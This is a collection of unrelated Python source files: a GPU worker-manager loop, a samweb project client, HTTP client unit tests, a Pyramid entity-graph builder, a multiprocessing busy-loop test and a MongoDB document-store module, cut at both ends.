write_to_log(log_file,(ts,key,text),show = VERBOSE)
# update progress tracking
available[worker_id] = 1
del in_progress[worker_id]
del time_of_last_message[worker_id]
del process_pids["worker {}".format(worker_id)]
del process_pids["loader {}".format(worker_id)]
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error {} shutting down finished process".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
try:
# randomly check one GPU for unresponsive processes (no output messages in last 60 seconds, and restart these)
worker_id = np.random.randint(0,g)
if worker_id in time_of_last_message.keys():
if time.time() - time_of_last_message[worker_id] > process_hang_max:
# kill process
# write log message
ts = time.time()
key = "WARNING"
text = "Manager detected unresponsive worker {}".format(worker_id)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
worker_pid = all_workers[worker_id].pid
print("Trying to terminate")
all_workers[worker_id].terminate()
print("Terminated")
all_workers[worker_id].join()
print("Joined")
# write log message
ts = time.time()
key = "WARNING"
text = "Manager terminated unresponsive worker {} (PID {}) on video sequence {}".format(worker_id,worker_pid,in_progress[worker_id])
write_to_log(log_file,(ts,key,text),show = VERBOSE)
# update progress tracking
available[worker_id] = 1
del all_workers[worker_id]
del in_progress[worker_id]
del time_of_last_message[worker_id]
del process_pids["worker {}".format(worker_id)]
del process_pids["loader {}".format(worker_id)]
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error {} terminating unresponsive process".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
#raise KeyboardInterrupt
try:
# make new log file if necessary
if os.stat(log_file).st_size > 1e+07: # slice into 10 MB log files
log_subidx += 1
log_file = os.path.join(ingest_session_path,"logs","cv_tracking_manager_{}_{}.log".format(str(log_idx).zfill(3),log_subidx))
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error {} creating new log file".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
# determine whether GPUs are still running, and restart if necessary
if time.time() - time_of_last_gpu_util > 120:
ts = time.time()
key = "WARNING"
text = "All GPUs have stopped processing. Terminating all worker processes to restart."
write_to_log(log_file,(ts,key,text),show = VERBOSE)
for worker in all_workers:
all_workers[worker].terminate()
all_workers[worker].join()
ts = time.time()
key = "DEBUG"
text = "All workers have been terminated. Sleeping for 60 seconds before restarting."
write_to_log(log_file,(ts,key,text),show = VERBOSE)
time.sleep(60)
except KeyboardInterrupt:
# interrupt log message
ts = time.time()
key = "WARNING"
message = "Keyboard Interrupt error caught. Shutting down worker processes now."
write_to_log(log_file,(ts,key,message),show = VERBOSE)
# terminate all worker processes (they will in turn terminate their daemon loaders)
for worker in all_workers:
all_workers[worker].terminate()
all_workers[worker].join()
# interrupt log message
ts = time.time()
key = "DEBUG"
message = "All worker processes have been terminated."
write_to_log(log_file,(ts,key,message),show = VERBOSE)
break # get out of processing main loop
if DONE:
print("Finished all video sequences")
for key in all_workers:
all_workers[key].terminate()
all_workers[key].join()
# end log message
ts = time.time()
key = "INFO"
message = "ENDED PROCESSING SESSION."
write_to_log(log_file,(ts,key,message),show = VERBOSE)
|
projects.py
|
import time, os, re
from samweb_client import json, convert_from_unicode
from samweb_client.client import samweb_method, get_version
from samweb_client.http_client import escape_url_path
from exceptions import *
from itertools import ifilter
@samweb_method
def listProjects(samweb, stream=False, **queryCriteria):
""" List projects matching query parameters
keyword arguments: passed as parameters to server
"""
params = dict(queryCriteria)
params['format'] = 'plain'
result = samweb.getURL('/projects', params, stream=True, compress=True)
output = ifilter( None, (l.strip() for l in result.iter_lines()) )
if stream: return output
else: return list(output)
@samweb_method
def makeProjectName(samweb, description):
""" Make a suitable project name from the provided string """
description = description.replace(' ','_')
import time
now = time.strftime("%Y%m%d%H%M%S")
name = "%s_%s" % (description, now)
# check for the username, offset by _ or -
# if it's not there prepend it
if samweb.user and not re.search(r'(\A|[_-])%s(\Z|[_-])' % samweb.user, name):
name = '%s_%s' % (samweb.user, name)
return name
@samweb_method
def startProject(samweb, project, defname=None, station=None, group=None, user=None, snapshot_id=None):
""" Start a project on a station. One of defname or snapshotid must be given
arguments:
project: project name
defname: definition name (default None)
station: station name (defaults to experiment name)
group: group name (defaults to experiment name)
user: user name (default is username from certificate)
snapshot_id: snapshot id (default None)
"""
if bool(defname) + bool(snapshot_id) != 1:
raise ArgumentError("Exactly one of definition name or snapshot id must be provided")
if not station: station = samweb.get_station()
if not group: group = samweb.group
args = {'name':project, 'station':station, "group":group}
if defname: args["defname"] = defname
elif snapshot_id: args["snapshot_id"] = snapshot_id
if user: args["username"] = user
result = samweb.postURL('/startProject', args, secure=True, compress=False)
projecturl = result.text.strip()
if projecturl.startswith('https'):
# prefer to use unencrypted project urls
projecturl = samweb.findProject(project, station)
# could look up definition name/snapshot id instead
rval = {'project':project,'projectURL':projecturl}
if defname: rval["definition_name"] = defname
elif snapshot_id: rval["snapshot_id"] = snapshot_id
return rval
@samweb_method
def findProject(samweb, project, station=None):
args = {'name':project}
if station: args['station'] = station
result = samweb.getURL('/findProject', args, compress=False)
return result.text.strip()
@samweb_method
def startProcess(samweb, projecturl, appfamily, appname, appversion, deliveryLocation=None, node=None,
user=None, maxFiles=None, description=None, schemas=None):
if not node:
# default for the node is the local hostname
import socket
node = socket.getfqdn()
# if the user isn't given and we aren't using client certs, set it to the default
if not user and not projecturl.startswith('https:'):
user = samweb.user
args = { "appname":appname, "appversion":appversion, "node" : node, }
if user:
args["username"] = user
if appfamily:
args["appfamily"] = appfamily
if maxFiles:
args["filelimit"] = maxFiles
if deliveryLocation:
args["deliverylocation"] = deliveryLocation
if description:
args["description"] = description
if schemas:
args["schemas"] = schemas
result = samweb.postURL(projecturl + '/establishProcess', args, compress=False)
return result.text.strip()
@samweb_method
def makeProcessUrl(samweb, projecturl, processid):
""" Make the process url from a project url and process id """
if not '://' in projecturl:
projecturl = samweb.findProject(projecturl)
return projecturl + '/process/' + str(processid)
@samweb_method
def getNextFile(samweb, processurl, timeout=None):
""" get the next file from the project
arguments:
processurl: the process url
timeout: timeout after not obtaining a file in this many seconds. -1 to disable; 0 to return immediately; default is None (disabled)
"""
url = processurl + '/getNextFile'
starttime = time.time()
while True:
result= samweb.postURL(url, data={}, compress=False)
code = result.status_code
data = result.text.strip()
if code == 202:
retry_interval = 10
retry_after = result.headers.get('Retry-After')
if retry_after:
try:
retry_interval = int(retry_after)
except ValueError: pass
if timeout is not None:
if timeout == 0:
return None
elif timeout > 0 and time.time() - starttime > timeout:
raise Timeout('Timed out after %d seconds' % (time.time() - starttime))
time.sleep(retry_interval)
elif code == 204:
raise NoMoreFiles()
else:
if 'application/json' in result.headers['Content-Type']:
return result.json()
lines = data.split('\n')
output = { "url" : lines[0] }
if len(lines) > 1: output["filename"] = lines[1]
else:
output["filename"] = os.path.basename(output["url"])
return output
# old method
@samweb_method
def releaseFile(samweb, processurl, filename, status="ok"):
if status == "ok": status = "consumed"
else: status = "skipped"
return samweb.setProcessFileStatus(processurl, filename, status)
# new method
@samweb_method
def setProcessFileStatus(samweb, processurl, filename, status="consumed"):
args = { 'filename' : filename, 'status':status }
return samweb.postURL(processurl + '/updateFileStatus', args, compress=False).text.rstrip()
@samweb_method
def stopProcess(samweb, processurl):
""" End an existing process """
samweb.postURL(processurl + '/endProcess', compress=False)
@samweb_method
def stopProject(samweb, projecturl):
if not '://' in projecturl:
projecturl = samweb.findProject(projecturl)
args = { "force" : 1 }
return samweb.postURL(projecturl + "/endProject", args, compress=False).text.rstrip()
@samweb_method
def projectSummary(samweb, projecturl):
if not '://' in projecturl:
projecturl = '/projects/name/%s' % escape_url_path(projecturl)
return convert_from_unicode(samweb.getURL(projecturl + "/summary").json(), compress=True)
@samweb_method
def projectSummaryText(samweb, projecturl):
if not '://' in projecturl:
projecturl = '/projects/name/%s' % escape_url_path(projecturl)
return samweb.getURL(projecturl + "/summary", params=dict(format='plain'), compress=True).text.rstrip()
@samweb_method
def projectRecoveryDimension(samweb, projectnameorurl, useFileStatus=None, useProcessStatus=None):
"""Get the dimensions to create a recovery dataset
arguments:
projectnameorurl : name or url of the project
useFileStatus : use the status of the last file seen by a process (default unset)
useProcessStatus : use the status of the process (default unset)
"""
if not '://' in projectnameorurl:
projectnameorurl = "/projects/name/%s" % escape_url_path(projectnameorurl)
params = { "format" : "plain" }
if useFileStatus is not None: params['useFiles'] = useFileStatus
if useProcessStatus is not None: params['useProcess'] = useProcessStatus
return convert_from_unicode(samweb.getURL(projectnameorurl + "/recovery_dimensions", params=params, compress=True).text.rstrip())
@samweb_method
def setProcessStatus(samweb, status, projectnameorurl, processid=None, process_desc=None):
""" Mark the final status of a process
Either the processid or the process description must be provided. If the description is
used it must be unique within the project
arguments:
status: completed or bad
projectnameorurl: project name or url
processid: process identifier
process_desc: process description
"""
if '://' not in projectnameorurl:
url = '/projects/name/%s' % escape_url_path(projectnameorurl)
else: url = projectnameorurl
args = { "status" : status }
if processid is not None:
url += '/processes/%s' % processid
elif process_desc is not None:
url += '/process_description/%s' % escape_url_path(process_desc)
else:
# assume direct process url
pass
return samweb.putURL(url + "/status", args, secure=True, compress=False).text.rstrip()
@samweb_method
def runProject(samweb, projectname=None, defname=None, snapshot_id=None, callback=None,
deliveryLocation=None, node=None, station=None, maxFiles=0, schemas=None,
application=('runproject','runproject',get_version()), nparallel=1, quiet=False ):
""" Run a project
arguments (use keyword arguments, all default to None):
projectname: the name for the project
defname: the defname to use
snapshot_id: snapshot_id to use
callback: a single argument function invoked on each file
deliveryLocation
node
station
maxFiles
schemas
application: a three element sequence of (family, name, version)
nparallel: number of processes to run in parallel
quiet: If true, suppress normal output
"""
if callback is None:
def _print(fileurl):
print fileurl
return True
callback = _print
if not projectname:
if defname:
projectname = samweb.makeProjectName(defname)
elif snapshot_id:
projectname = samweb.makeProjectName('snapshot_id_%d' % snapshot_id)
if quiet:
def write(s): pass
else:
import sys
write=sys.stdout.write
project = samweb.startProject(projectname, defname=defname, snapshot_id=snapshot_id, station=station)
write("Started project %s\n" % projectname)
projecturl = project['projectURL']
process_description = ""
appFamily, appName, appVersion = application
if nparallel is None or nparallel < 2:
nparallel=1
if nparallel > 1:
import threading
maxFiles=(maxFiles+nparallel-1)//nparallel
def runProcess():
cpid = samweb.startProcess(projecturl, appFamily, appName, appVersion, deliveryLocation, node=node, description=process_description, maxFiles=maxFiles, schemas=schemas)
write("Started consumer processs ID %s\n" % (cpid,))
if nparallel > 1:
threading.currentThread().setName('CPID-%s' % cpid)
log_prefix = '%s: ' % threading.currentThread().getName()
else: log_prefix=''
processurl = samweb.makeProcessUrl(projecturl, cpid)
while True:
try:
newfile = samweb.getNextFile(processurl)['url']
try:
rval = callback(newfile)
except Exception, ex:
write('%s%s\n' % (log_prefix,ex))
rval = 1
except NoMoreFiles:
break
if rval: status = 'ok'
else: status = 'bad'
samweb.releaseFile(processurl, newfile, status)
samweb.setProcessStatus('completed', processurl)
if nparallel < 2:
runProcess()
else:
threads = []
for i in range(nparallel):
t = threading.Thread(target=runProcess, name='Thread-%02d' % (i+1,))
t.start()
threads.append(t)
for t in threads: t.join()
samweb.stopProject(projecturl)
write("Stopped project %s\n" % projectname)
return projectname
@samweb_method
def prestageDataset(samweb, projectname=None, defname=None, snapshot_id=None, maxFiles=0, station=None, deliveryLocation=None, node=None, nparallel=1):
""" Prestage the given dataset. This is really the same as run-project with names set appropriately """
if nparallel is None or nparallel < 2: nparallel = 1
def prestage(fileurl):
if nparallel > 1:
import threading
prefix = '%s: ' % threading.currentThread().getName()
else:
prefix = ''
print "%sFile %s is staged" % (prefix, os.path.basename(fileurl))
return True
if not projectname:
projectname = 'prestage'
if defname:
projectname = samweb.makeProjectName('%s_%s' % (defname, projectname))
elif snapshot_id:
projectname = samweb.makeProjectName('snapshot_id_%d_%s' % (snapshot_id, projectname))
samweb.runProject(projectname=projectname, defname=defname, snapshot_id=snapshot_id,
application=('prestage','prestage',get_version()), callback=prestage, maxFiles=maxFiles,
station=station, deliveryLocation=deliveryLocation, node=node, nparallel=nparallel)
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
print(req.body)
print("HERH```````````````````")
# print(req.body["a"])
outargs = json.loads(req.body)
print(type(outargs))
print(outargs['a'][0])
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
Entity.py
|
from pyramid.response import Response
from pyramid.view import view_config
import os
import sys
import time
import json
from datetime import datetime, timedelta
from lxml import etree, html
from .config import Config
import logging
log = logging.getLogger(__name__)
import networkx as nx
from networkx.readwrite import json_graph
from .Helpers import *
import multiprocessing
from pymongo.errors import (
OperationFailure
)
import pymongo
class Entity:
def __init__(self, request):
"""For a given site - assemble the entity graph
@params:
request.matchdict: code, the site of interest
request.matchdict: explore, the type of graph being requested
"""
self.request = request
self.db = mdb(request)
self.site = request.matchdict.get('code')
self.eid = request.matchdict.get('id')
claims, site = verify_access(request, site=self.site)
self.eac_path = site['eac']
self.source_map = site['map']
self.name = site['name']
self.url = site['url']
log.debug("Processing site: %s, data path: %s" % (self.site, self.eac_path))
def build(self) :
# is the data available? return now; nothing to do
doc = self.db.entity.find_one({ 'site': self.site, 'id': self.eid })
if doc is not None:
log.debug('Graph already built. No need to build it again')
return
j = multiprocessing.Process(target=self.build_graph)
j.start()
def build_graph(self):
log.debug('Building the graph.')
t1 = time.time()
self.graph = nx.Graph()
count = 0
save_counter = 0
nodes = {}
fname = os.path.join(self.eac_path, "%s.xml" % self.eid)
try:
tree = etree.parse(fname)
except (TypeError, etree.XMLSyntaxError):
log.error("Invalid XML file: %s. %s." % (fname, sys.exc_info()[1]))
ndegrees = 0
self.entities_as_nodes(tree, ndegrees)
# count the number of connections
for n in self.graph:
self.graph.node[n]['connections'] = len(list(self.graph.neighbors(n)))
# save the graph
self.db.entity.insert({
'site': self.site,
'id': self.eid,
'graph_data': json_graph.node_link_data(self.graph),
'createdAt': datetime.utcnow()
})
data_age = self.request.registry.app_config['general']['data_age']
try:
self.db.entity.ensure_index('createdAt', expireAfterSeconds = int(data_age))
except OperationFailure:
self.db.entity.drop_index('createdAt_1')
self.db.entity.ensure_index('createdAt', expireAfterSeconds = int(data_age))
# all done
t2 = time.time()
log.debug("Time taken to prepare data '/entity': %s" % (t2 - t1))
return
def entities_as_nodes(self, tree, ndegrees):
node_id = get(tree, '/e:eac-cpf/e:control/e:recordId')
ntype = get(tree, "/e:eac-cpf/e:control/e:localControl[@localType='typeOfEntity']/e:term")
core_type = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:entityType")
url = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:entityId[1]")
df = get(tree, "/e:eac-cpf/e:cpfDescription/e:description/e:existDates/e:dateRange/e:fromDate", attrib="standardDate")
dt = get(tree, "/e:eac-cpf/e:cpfDescription/e:description/e:existDates/e:dateRange/e:toDate", attrib="standardDate")
name = self.get_entity_name(tree, ntype)
if len(df) == 0:
df = None
if len(dt) == 0:
dt = None
if node_id not in self.graph:
try:
self.graph.add_node(node_id)
except:
# somethinge serious wrong. This should raise an exception so we can clean up the network_progress
e = sys.exc_info()[0]
log.error("Failed to insert node %s" % e)
self.graph.node[node_id]['type'] = ntype
self.graph.node[node_id]['coreType'] = core_type
self.graph.node[node_id]['name'] = name
self.graph.node[node_id]['url'] = url
self.graph.node[node_id]['df'] = df
self.graph.node[node_id]['dt'] = dt
if ndegrees == 2:
return
ndegrees += 1
related_entities = get(tree, '/e:eac-cpf/e:cpfDescription/e:relations/e:cpfRelation', element=True)
for node in related_entities:
try:
neighbour_ref = node.attrib['{http://www.w3.org/1999/xlink}href']
if neighbour_ref.startswith('http'):
neighbour_ref_local = neighbour_ref.replace(self.source_map['source'], self.source_map['localpath'])
else:
# assume it's relative
neighbour_ref_local = "%s/%s" % (self.source_map['localpath'], neighbour_ref)
try:
xml_datafile = get_xml(href=neighbour_ref_local)
if xml_datafile is not None:
if xml_datafile.startswith('http'):
xml_datafile_local = xml_datafile.replace(self.source_map['source'], self.source_map['localpath'])
else:
# assume it's relative
xml_datafile_local = "%s/%s" % (self.source_map['localpath'], xml_datafile)
neighbour_tree = etree.parse(xml_datafile_local)
else:
raise IOError
except IOError:
log.error("No EAC reference to XML source in: %s" % neighbour_ref_local)
continue
except etree.XMLSyntaxError:
log.error("Invalid XML file: %s" % xml_datafile)
continue
except TypeError:
log.error("Some kind of error with: %s" % xml_datafile)
continue
neighbour_id = get(neighbour_tree, '/e:eac-cpf/e:control/e:recordId')
if len(neighbour_id) == 0:
# we've probably read an eac file - try the eac xpath
neighbour_id = get(neighbour_tree, '/eac/control/id')
# add node, add edge, call this method on this node
self.graph.add_node(neighbour_id)
self.graph.add_edge(node_id, neighbour_id, sid=node_id, tid=neighbour_id)
self.entities_as_nodes(neighbour_tree, ndegrees)
except KeyError:
print(etree.tostring(node, pretty_print=True))
related_resources = list(get(tree, '/e:eac-cpf/e:cpfDescription/e:relations/e:resourceRelation[@resourceRelationType="other"]', element=True, aslist=True))
for node in related_resources:
# for each node - get the id, type, name and href
# add a node to describe it
# add an edge between this node (context node) and the resource node
rurl = node.attrib['{http://www.w3.org/1999/xlink}href']
core_type = get(node, 'e:relationEntry', attrib='localType')
rname = get(node, 'e:relationEntry')
rid = rurl.split('/')[-1:][0].split('.htm')[0]
if core_type == 'published':
rtype = rname.split(':')[0]
rname = rname.split(':', 1)[1:][0].strip()
else:
rtype = core_type
if rid not in self.graph:
try:
self.graph.add_node(rid)
except:
# somethinge serious wrong. This should raise an exception so we can clean up the network_progress
e = sys.exc_info()[0]
log.error("Failed to insert node %s" % e)
return
#if we get here we have a valid node
self.graph.node[rid]['type'] = rtype
self.graph.node[rid]['coreType'] = core_type
self.graph.node[rid]['name'] = rname
self.graph.node[rid]['url'] = rurl
self.graph.add_edge(rid, node_id, sid=rid, tid=node_id)
def get_entity_name(self, tree, ntype):
if ntype == 'Person':
if get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry/e:part[@localType='familyname']"):
ln = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry/e:part[@localType='familyname']")
gn = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry/e:part[@localType='givenname']")
return "%s, %s" % (ln, gn)
else:
fn = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry[position() = 1]/e:part")
if type(fn) == list:
return ', '.join(fn)
return fn
else:
fn = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry[position() = 1]/e:part")
if type(fn) == list:
return ', '.join(fn)
return fn
def data(self):
# get the data file url
if self.request.GET.get('q') is not None:
datafile = self.request.GET.get('q').replace(self.source_map['source'], self.source_map['localpath'])
else:
return ''
# if there's an EAC ref - use it
xml = get_xml(datafile)
if xml is not None:
tree = etree.parse(xml.replace(self.source_map['source'], self.source_map['localpath']))
summnote = get(tree, '/e:eac-cpf/e:cpfDescription/e:description/e:biogHist/e:abstract', element=True)
sn = ''
if len(summnote) != 0:
sn = etree.tostring(get(tree, '/e:eac-cpf/e:cpfDescription/e:description/e:biogHist/e:abstract', element=True), method='html')
sn=sn.decode('UTF8')
full_note = get(tree, '/e:eac-cpf/e:cpfDescription/e:description/e:biogHist', element=True)
fn = ''
if len(full_note) != 0:
fn = []
for c in full_note.getchildren():
if c.tag == '{urn:isbn:1-931666-33-4}abstract':
c.getparent().remove(c)
full_note = [ etree.tostring(f, method='html').decode('UTF8') for f in full_note ]
for c in full_note:
c = c.replace('<list', '<ul' )
c = c.replace('</list', '</ul')
c = c.replace('<item', '<li' )
c = c.replace('</item', '</li')
fn.append(c)
fn = ' '.join(fn)
return str(sn), str(fn)
else:
# no EAC datafile
tree = html.parse(datafile)
data = tree.xpath('//dl[@class="content-summary"]')
return None, etree.tostring(data[0]).decode('UTF8')
|
process_test.py
|
#!/usr/bin/python
# coding=utf8
import math
import sys
from multiprocessing import Pool
from multiprocessing import Process
def f(x):
return x*x
#if __name__ == '__main__':
# p = Pool(5)
# print(p.map(f, range(100000000)))
def process_fun(num):
sum = 0
while(1):
sum += 1
p = math.sin(sum * math.pi)
if sum % 10000 == 0:
sys.stdout.write('thread-%d: %d\n' % (num, sum))
if __name__ == '__main__':
for i in range(10):
print('starting process %d...' % i)
p = Process(target=process_fun, args=(i,))
p.start()
print('all process started')
|
database.py
|
from threading import Thread
from collections import defaultdict, OrderedDict
import schedule
import time
import os
import glob
import glob2
import json
from tqdm import tqdm
import concurrent.futures as cf
from functools import partial
import pickle
from bson.binary import Binary
import datetime
from . import Params
from . import Connection
#from section_translator import SectionTranslator
class Database:
"""
==============================================================================
==============================================================================
DDBB METHODS
==============================================================================
==============================================================================
"""
"""
==============================================================================
CACHE
==============================================================================
"""
CACHE = {
}
def add_cache(name, data, valid=None):
if valid is None:
valid = datetime.timedelta(hours=12)
Database.CACHE[name] = {
'data': data,
'valid': datetime.datetime.now() + valid
}
def get_cache(name):
data = Database.CACHE.get(name, None)
if data['valid'] <= datetime.datetime.now():
return data['data']
else:
return None
"""
==============================================================================
METHODS HOOK
==============================================================================
"""
METHODS = {}
@staticmethod
def register_method(class_method):
if hasattr(class_method, 'NAME'):
name = getattr(class_method, 'NAME')
else:
name = class_method.__class__.__name__
assert('.' not in name and '$' not in name)
Database.METHODS[name] = {
'class': class_method,
'init': False
}
@staticmethod
def get_method(name):
assert('.' not in name and '$' not in name)
class_dict = Database.METHODS[name]
method_obj = class_dict['class']
if not class_dict['init']:
method_obj.init()
class_dict['init'] = True
return method_obj
@staticmethod
def list_methods():
return list(Database.METHODS.keys())
"""
==============================================================================
INSERTION
==============================================================================
"""
@staticmethod
def exists(hash_id):
return Connection.DB.documents.find_one({'hash_id': hash_id}) is not None
@staticmethod
def format_document_from_raw(raw_document):
document = {
'hash_id': raw_document['hash_id'],
'title': raw_document['title'],
'url': None,
'clean': {
#sections: ...
# citations: ...
},
'raw': {
'authors': raw_document['authors'],
'sections': raw_document['sections'],
'citations': raw_document['citations'],
'bib_entries': raw_document['bib_entries'],
'ref_entries': raw_document['ref_entries']
},
'sections_order': raw_document['sections_order'],
'sections_embeddings': {
# algorithm:
# word2vec:
# abstract: {
# vector: ...
# num_elements: ...
# }
},
'entities': {
# words:
# embeddings
},
'topics': None, # embeddings,
'sections_translation': {
# section -> {#method, #abstract, #conclusions, #results, #acks, #references}
}
}
return document
@staticmethod
def insert_raw_documents(raw_documents):
"""
raw_documents: list of raw_documents
"""
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
documents = [Database.format_document_from_raw(doc) for doc in raw_documents]
Connection.DB.documents.insert_many(documents)
@staticmethod
def insert_raw_document(raw_document):
"""
raw_document: dict
"""
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
doc = Database.format_document_from_raw(raw_document)
Connection.DB.documents.insert_one(doc)
"""
==============================================================================
UPDATE
==============================================================================
"""
@staticmethod
def update_raw_documents(raw_documents):
"""
raw_documents: dict
- hash_id
- sections
- citations
"""
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
for doc in clean_documents:
Connection.DB.documents.update_one({'hash_id': doc['hash_id']}, {'$set': {'raw': doc}}, upsert=True)
@staticmethod
